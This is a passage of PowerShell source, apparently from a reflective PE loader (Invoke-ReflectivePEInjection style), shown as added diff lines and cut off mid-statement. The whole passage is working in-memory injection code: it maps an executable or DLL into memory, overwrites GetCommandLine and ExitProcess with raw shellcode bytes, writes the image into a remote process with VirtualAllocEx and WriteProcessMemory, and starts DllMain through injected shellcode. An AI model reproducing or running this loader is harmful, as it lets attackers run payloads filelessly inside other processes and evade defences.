+ $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE + } + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_READWRITE + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_READONLY + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_NOACCESS + } + } + } + + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) + { + $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE + } + + return $ProtectionFlag + } + + Function Update-MemoryProtectionFlags + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) + $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) + [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress) + + [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics + [UInt32]$SectionSize = $SectionHeader.VirtualSize + + [UInt32]$OldProtectFlag = 0 + Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null + $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Unable to change memory protection" + } + } + } + + #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE + #Returns an object with addresses to copies of the bytes that were overwritten (and the count) + Function Update-ExeFunctions + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [String] + $ExeArguments, + + [Parameter(Position = 4, Mandatory = $true)] + [IntPtr] + $ExeDoneBytePtr + ) + + #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state. + $ReturnArray = @() + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) + [UInt32]$OldProtectFlag = 0 + + [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll") + if ($Kernel32Handle -eq [IntPtr]::Zero) + { + throw "Kernel32 handle null" + } + + [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll") + if ($KernelBaseHandle -eq [IntPtr]::Zero) + { + throw "KernelBase handle null" + } + + ################################################# + #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it. + # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want. + $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) + $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) + + [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA") + [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW") + + if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) + { + throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)" + } + + #Prepare the shellcode + [Byte[]]$Shellcode1 = @() + if ($PtrSize -eq 8) + { + $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8 + } + $Shellcode1 += 0xb8 + + [Byte[]]$Shellcode2 = @(0xc3) + $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + + #Make copy of GetCommandLineA and GetCommandLineW + $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null + $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null + $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize) + $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize) + + #Overwrite GetCommandLineA + [UInt32]$OldProtectFlag = 0 + $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + + $GetCommandLineAAddrTemp = $GetCommandLineAAddr + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp + $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) + $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp + + $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + + + #Overwrite GetCommandLineW + [UInt32]$OldProtectFlag = 0 + $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + + $GetCommandLineWAddrTemp = $GetCommandLineWAddr + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp + $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false) + $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp + + $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + ################################################# + + ################################################# + #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work. + # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln. + # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the + # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported. + $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" ` + , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll") + + foreach ($Dll in $DllList) + { + [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll) + if ($DllHandle -ne [IntPtr]::Zero) + { + [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln") + [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln") + if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero) + { + "Error, couldn't find _wcmdln or _acmdln" + } + + $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) + $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) + + #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state + $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr]) + $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr]) + $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false) + $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize) + $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize) + + $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false) + $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null + + $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false) + $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null + } + } + ################################################# + + ################################################# + #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits. + + $ReturnArray = @() + $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process + + #CorExitProcess (compiled in to visual studio c++) + [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll") + if ($MscoreeHandle -eq [IntPtr]::Zero) + { + throw "mscoree handle null" + } + [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess") + if ($CorExitProcessAddr -eq [IntPtr]::Zero) + { + Throw "CorExitProcess address not found" + } + $ExitFunctions += $CorExitProcessAddr + + #ExitProcess (what non-managed programs use) + [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess") + if ($ExitProcessAddr -eq [IntPtr]::Zero) + { + Throw "ExitProcess address not found" + } + $ExitFunctions += $ExitProcessAddr + + [UInt32]$OldProtectFlag = 0 + foreach ($ProcExitFunctionAddr in $ExitFunctions) + { + $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr + #The following is the shellcode (Shellcode: ExitThread.asm): + #32bit shellcode + [Byte[]]$Shellcode1 = @(0xbb) + [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) + #64bit shellcode (Shellcode: ExitThread.asm) + if ($PtrSize -eq 8) + { + [Byte[]]$Shellcode1 = @(0x48, 0xbb) + [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) + } + [Byte[]]$Shellcode3 = @(0xff, 0xd3) + $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length + + [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread") + if ($ExitThreadAddr -eq [IntPtr]::Zero) + { + Throw "ExitThread address not found" + } + + $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Call to VirtualProtect failed" + } + + #Make copy of original ExitProcess bytes + $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null + $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize) + + #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then + # call ExitThread + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false) + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false) + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize + Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp + + $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + } + ################################################# + + Write-Output $ReturnArray + } + + #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count) + # It copies Count bytes from Source to Destination. + Function Copy-ArrayOfMemAddresses + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Array[]] + $CopyInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + [UInt32]$OldProtectFlag = 0 + foreach ($Info in $CopyInfo) + { + $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Call to VirtualProtect failed" + } + + $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null + + $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + } + } + + + ##################################### + ########## FUNCTIONS ########### + ##################################### + Function Get-MemoryProcAddress + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [String] + $FunctionName + ) + + $Win32Types = Get-Win32Types + $Win32Constants = Get-Win32Constants + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + + #Get the export table + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) + { + return [IntPtr]::Zero + } + $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) + $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY) + + for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) + { + #AddressOfNames is an array of pointers to strings of the names of the functions exported + $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) + $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])) + $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) + + if ($Name -ceq $FunctionName) + { + #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions + # which contains the offset of the function in to the DLL + $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))) + $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16]) + $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) + $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32]) + return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset) + } + } + + return [IntPtr]::Zero + } + + + Function Invoke-MemoryLoadLibrary + { + Param( + [Parameter( Position = 0, Mandatory = $true )] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $false)] + [String] + $ExeArgs, + + [Parameter(Position = 2, Mandatory = $false)] + [IntPtr] + $RemoteProcHandle, + + [Parameter(Position = 3)] + [Bool] + $ForceASLR = $false + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) + + #Get Win32 constants and functions + $Win32Constants = Get-Win32Constants + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + + $RemoteLoading = $false + if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero)) + { + $RemoteLoading = $true + } + + #Get basic PE information + Write-Verbose "Getting basic PE information from the file" + $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types + $OriginalImageBase = $PEInfo.OriginalImageBase + $NXCompatible = $true + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + { + Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue + $NXCompatible = $false + } + + #Verify that the PE and the current process are the same bits (32bit or 64bit) + $Process64Bit = $true + if ($RemoteLoading -eq $true) + { + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process") + if ($Result -eq [IntPtr]::Zero) + { + Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit" + } + + [Bool]$Wow64Process = $false + $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process) + if ($Success -eq $false) + { + Throw "Call to IsWow64Process failed" + } + + if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4))) + { + $Process64Bit = $false + } + + #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly + $PowerShell64Bit = $true + if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) + { + $PowerShell64Bit = $false + } + if ($PowerShell64Bit -ne $Process64Bit) + { + throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process" + } + } + else + { + if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) + { + $Process64Bit = $false + } + } + if ($Process64Bit -ne $PEInfo.PE64Bit) + { + Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)" + } + + #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address + Write-Verbose "Allocating memory for the PE and write its headers to memory" + + #ASLR check + [IntPtr]$LoadAddr = [IntPtr]::Zero + $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE + if ((-not $ForceASLR) -and (-not $PESupportsASLR)) + { + Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue + [IntPtr]$LoadAddr = $OriginalImageBase + } + elseif ($ForceASLR -and (-not $PESupportsASLR)) + { + Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash." + } + + if ($ForceASLR -and $RemoteLoading) + { + Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop + } + if ($RemoteLoading -and (-not $PESupportsASLR)) + { + Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop + } + + $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell + $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process. + if ($RemoteLoading -eq $true) + { + #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup + $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + + #todo, error handling needs to delete this memory if an error happens along the way + $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($EffectivePEHandle -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use" + } + } + else + { + if ($NXCompatible -eq $true) + { + $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + } + else + { + $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + } + $EffectivePEHandle = $PEHandle + } + + [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage) + if ($PEHandle -eq [IntPtr]::Zero) + { + Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)." + } + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null + + + #Now that the PE is in memory, get more detailed information about it + Write-Verbose "Getting detailed PE information from the headers loaded in memory" + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress + $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle + Write-Verbose "StartAddress: $(Get-Hex $PEHandle) EndAddress: $(Get-Hex $PEEndAddress)" + + + #Copy each section from the PE in to memory + Write-Verbose "Copy PE sections in to memory" + Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types + + + #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded + Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory" + Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types + + + #The PE we are in-memory loading has DLLs it needs, import those DLLs for it + Write-Verbose "Import DLL's needed by the PE we are loading" + if ($RemoteLoading -eq $true) + { + Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle + } + else + { + Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants + } + + + #Update the memory protection flags for all the memory just allocated + if ($RemoteLoading -eq $false) + { + if ($NXCompatible -eq $true) + { + Write-Verbose "Update memory protection flags" + Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types + } + else + { + Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute" + } + } + else + { + Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions" + } + + + #If remote loading, copy the DLL in to remote process memory + if ($RemoteLoading -eq $true) + { + [UInt32]$NumBytesWritten = 0 + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten) + if ($Success -eq $false) + { + Throw "Unable to write shellcode to remote process memory." + } + } + + + #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function + if ($PEInfo.FileType -ieq "DLL") + { + if ($RemoteLoading -eq $false) + { + Write-Verbose "Calling dllmain so the DLL knows it has been loaded" + $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) + $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) + + $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null + } + else + { + $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + + if ($PEInfo.PE64Bit -eq $true) + { + #Shellcode: CallDllMain.asm + $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9) + $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8) + $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + } + else + { + #Shellcode: CallDllMain.asm + $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9) + $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8) + $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3) + } + $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress 